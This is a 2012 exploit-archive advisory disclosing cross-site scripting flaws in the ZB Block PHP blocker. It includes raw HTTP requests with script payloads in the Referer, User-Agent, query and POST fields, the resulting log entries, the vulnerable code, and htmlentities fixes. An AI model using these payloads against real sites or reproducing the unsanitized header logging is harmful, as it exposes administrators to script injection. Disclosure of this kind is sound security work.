Home / exploits ZB Block Cross Site Scripting
Posted on 06 March 2012
-------------------------------------------------------------------------------------------------------------------- Vulnerable Software: // ZAPHOD BREEBLEBROX'S BLOCKER A.K.A. ZB BLOCK // VERSION 0.4.9 Final "Jaguar" 0.4.9_Final Developed by HTTP://WWW.SPAMBOTSECURITY.COM -------------------------------------------------------------------------------------------------------------------- Severity: *Low* -------------------------------------------------------------------------------------------------------------------- Vulnerability Description: XSS-(CROSS SITE SCRIPTING VULNERABILITIES) -------------------------------------------------------------------------------------------------------------------- Founded by: AkaStep ------------------------------------------------------------------------------------------------------------------- Description: ZB Block is distributed under the GNU/GPL Version 2 License. It's main goal: Act as "Honeypot" on your site and block intrusions. For more info: SPAMBOTSECURITY.COM ------------------------------------------------------------------------------------------------------------------- Vulnerability Desc: Due "trust" to HTTP_USER_AGENT and HTTP_REFERER ZB Block is vulnerable to non-persistent cross site scripting vulnerability. However it also logs attacks so unsanitized thus variables will be writen to killed_logs.txt which on "future" may act as Persistent Cross Site Scripting Vulnerability against admin. ------------------------------------------------------------------------------------------------------------------- Proof of Concept: ====================Triggering Attack Against Site which is protected using ZB Block======================== cmd> GET /myfiles/10/zbblock/hackme.php?id=<script>alert("Is it safe?");</script> HTTP/1.0 cmd> Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */* cmd> Referer: http://microshit.attacks/you?id=<script>alert("Pwn using Referer");</script> cmd> User-Agent: <script>alert("Pwn Using user Agent");</script> cmd> Host: 192.168.0.15 cmd> hdr> HTTP/1.1 403 FORBIDDEN hdr> Date: Mon, 05 Mar 2012 13:36:51 GMT hdr> Server: Apache hdr> Status: 403 FORBIDDEN hdr> Warning: 199 192.168.0.15:80 You_are_abusive/hacking/spamming_192.168.0.15 hdr> Abuse: Your connection is not welcome due to: http javascript (wedge end/script start) injection. XSS attack obfuscation. http javascript (wedge end/script start) injection. http javascript (wedge start/script end) injection. http javascript (wedge end/script start) injection. http javascript (wedge start/script end) injection. hdr> Content-Length: 3890 hdr> Content-Type: text/html RequestDone Error = 0 StatusCode = 403 ================= END OF REQUEST ====================================== Responce:(Take a look it doesn't touches HTTP_REFERER and HTTP_USER_AGENT( and it is same as "original" - without any sanitization) --------------------------------------------------- SNIPPET GOES ------------------------------------------------------- <strong><font color="#0000FF">Record #:</font></strong> 1<br> <strong><font color="#0000FF">Time:</font></strong> Mon, 05 Mar 2012 13:36:51 +0000<br> <strong><font color="#0000FF">Running:</font></strong> 0.4.9_Final<br> <strong><font color="#0000FF">Host:</font></strong> labmachine.mshome.net<br> <strong><font color="#0000FF">IP:</font></strong> 192.168.0.1<br> <strong><font color="#0000FF">Post:</font></strong> <br> <strong><font color="#0000FF">Query:</font></strong> id=<script>alert("Is<br> <strong><font color="#0000FF">Stripped Query:</font></strong> id=<script>alert("is<br> <strong><font color="#0000FF">Referer:</font></strong> http://microshit.attacks/you?id=<script>alert("pwn using referer");</script><br> <strong><font color="#0000FF">User Agent:</font></strong> <script>alert("Pwn Using user Agent");</script><br> <strong><font color="#0000FF">Reconstructed URL:</font></strong> http:// 192.168.0.15 /myfiles/10/zbblock/hackme.php?id=<script>alert("Is<br> <br> Generated by <a href="http://www.spambotsecurity.com/zbblock.php" >ZB Block 0.4.9_Final</a></p> </body> </html> --------------------------------------------------- END OF SNIPPET ------------------------------------------------------- Print Screen: http://i009.radikal.ru/1203/71/7d0fd71f5c5d.png /*----------------------------------------------VULNERABLE CODE--------------------------------------------------------------*/ //zbblock.php // LINE NO 455 && 459 if(isset($_SERVER['HTTP_REFERER'])){$fromhost2=@$_SERVER['HTTP_REFERER'];} $fromhost=strtolower($fromhost2); $fromhostsws=preg_replace('/s+/','',$fromhost); $fromhostsws=preg_replace("/[^x9xAxDx20-x7F]/",'',$fromhostsws); if(isset($_SERVER['HTTP_USER_AGENT'])){$useragent=@$_SERVER['HTTP_USER_AGENT'];} $lcuseragent=strtolower($useragent); $lcuseragentsws=preg_replace('/s+/','',$lcuseragent); $lcuseragentsws=preg_replace("/[^x9xAxDx20-x7F]/",'',$lcuseragentsws); /*------------------------------------- END OF VULNERABLE CODE -------------------------------------------------------*/ Defaulty this script writes log file: filename: killed_log.txt Exist in: {zbblockWHERE_INSTALLED}/vault/killed_log.txt Which is not readable from HTTP (because access to that area protected using .htaccess (Deny from all) Ok,lets see it's content after triggering attack: ----------------------------------------------------------------------------------------------------------------------------------------- # cat -n killed_log.txt|less 1 <?php die(''); ?> 2 3 #: 1 @: Mon, 05 Mar 2012 13:36:09 +0000 Running: 0.4.9_Final 4 Host: labmachine.mshome.net 5 IP: 192.168.0.1 6 Score: 6 7 Violation count: 0 8 Why blocked: http javascript (wedge end/script start) injection. XSS attack obfuscation. http javascript (wedge end/script start) injection. http javascript (wedge start/script end) injection. http javascript (wedge end/script start) injection. http ja vascript (wedge start/script end) injection. 9 Query: id=<ScRiPt>AlErT("Not 10 Referer: http://microshit.attacks/you?id=<script>alert("pwn using referer");</script> 11 User Agent: <script>alert("Pwn Using user Agent");</script> 12 Reconstructed URL: http:// 192.168.0.15 /myfiles/10/zbblock/hackme.php?id=<ScRiPt>AlErT("Not 13 14 #: 1 @: Mon, 05 Mar 2012 13:36:51 +0000 Running: 0.4.9_Final 15 Host: labmachine.mshome.net 16 IP: 192.168.0.1 17 Score: 6 18 Violation count: 1 19 Why blocked: http javascript (wedge end/script start) injection. XSS attack obfuscation. http javascript (wedge end/script start) injection. http javascript (wedge start/script end) injection. http javascript (wedge end/script start) injection. http ja vascript (wedge start/script end) injection. 20 Query: id=<script>alert("Is 21 Referer: http://microshit.attacks/you?id=<script>alert("pwn using referer");</script> 22 User Agent: <script>alert("Pwn Using user Agent");</script> 23 Reconstructed URL: http:// 192.168.0.15 /myfiles/10/zbblock/hackme.php?id=<script>alert("Is 24 ------------------------------------------------------------------------------------------------------------------------------------------------ As you can see: 10 Referer: http://microshit.attacks/you?id=<script>alert("pwn using referer");</script> 11 User Agent: <script>alert("Pwn Using user Agent");</script> 21 Referer: http://microshit.attacks/you?id=<script>alert("pwn using referer");</script> 22 User Agent: <script>alert("Pwn Using user Agent");</script> Same as original.In future which may cause problems for site administrator. Can't because .txt file and protected using .htaccess ? :) This gives to us a bit advantage to catch site admin and automatically exploitate our XSS attack. Theris a chance admin will read that file using some "reader script" and admin believes that killed_log.txt is safe) In ex: ---------------------------------------------------------------------------------------------------------------------------------------------- <?php echo '<pre>' . file_get_contents('./vault/killed_log.txt') . '</pre>'; ?> ---------------------------------------------------------------------------------------------------------------------------------------------- So, theris a chance to execute our javascript(html) in context of admin's browser. Fix so simple: ZB BLOCK Developer(s) should note that HTTP_USER_AGENT AND HTTP_REFERER isn't "trust"-able and may be spoofed or injected easily. So htmlentities() or strip_tags() our best friends in this case :) ------------------------------------------------- FIX 1--------------------------------------------------------------------------------------- //zbblock.php //LINE NO 455 if(isset($_SERVER['HTTP_REFERER'])){$fromhost2=htmlentities(@$_SERVER['HTTP_REFERER']);} //LINE NO 459 if(isset($_SERVER['HTTP_USER_AGENT'])){$useragent=htmlentities(@$_SERVER['HTTP_USER_AGENT']);} // END OF ----------------------------------------------------------------------------------------------------------------------------------------------- Also here is another non-persistent XSS while detecting POST request intrusion attempt. --------------------------------------------- POST METHOD-------------------------------------------------------------------------------------- cmd> POST /myfiles/10/zbblock/hackme.php HTTP/1.0 cmd> Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */* cmd> Referer: http://192.168.0.15/myfiles/10/zbblock/hackme.php cmd> Content-Type: application/x-www-form-urlencoded cmd> Host: 192.168.0.15 cmd> Content-Length: 58 cmd> hdr> HTTP/1.1 403 FORBIDDEN hdr> Date: Mon, 05 Mar 2012 17:53:01 GMT hdr> Server: Apache hdr> Status: 403 FORBIDDEN hdr> Warning: 199 192.168.0.15:80 You_are_abusive/hacking/spamming_192.168.0.15 hdr> Abuse: Your connection is not welcome due to: POST JS POST-058. POST JS POST-059. hdr> Content-Length: 3548 hdr> Content-Type: text/html RequestDone Error = 0 StatusCode = 403 POSTDATA: f=<script>alert("Pwned");</script>&fupl=G%F6nd%26%23601%3Br%21 // Take a look our payload is not in urlencoded // ------------------------------------------------------------------------------------------------------------------------------------------------- Responce: ----------------------- SNIPPET ------------------------------------------------------------------------------------- <strong><font color="#0000FF">Post:</font></strong> f=<script>alert("Pwned");</script>&fupl=G%F6nd%26%23601%3Br%21<br> ----------------------- END OF SNIPPET ------------------------------------------------------------------------------------- ------------------------------------------------------------------------------------------------------------------------------------------------- So why this occurs? Again we are going to look our code: ------------------------------------------ VULNERABLE CODE ------------------------------------------------------------- //zbblock.php // Line: no: 856 <strong><font color="#0000FF">Post:</font></strong> ' . $rawpost . '<br> // ------------------------------------------------------------------------------------------------------------------------ //And if we'll look to up line no: 472 $rawpost=file_get_contents("php://input"); //No sanitization again // I think /*--------------------------- SINCE POST DATA content is not logging to killed_logs.txt and it is only for print to client side we can use on line 855 <strong><font color="#0000FF">Post:</font></strong> ' . htmlentities($rawpost) . '<br> This also applies to line no: 838 $dummy = $ini['e_mail'] . '?subject=Event ID:#' . $zbcounter . ' on ' . $thishost . '&body=' . htmlentities($dummy); ---------------------------------------------------------- EOF --------------------------------------------------------------------------------*/ /AkaStep ^_^ 1330959272
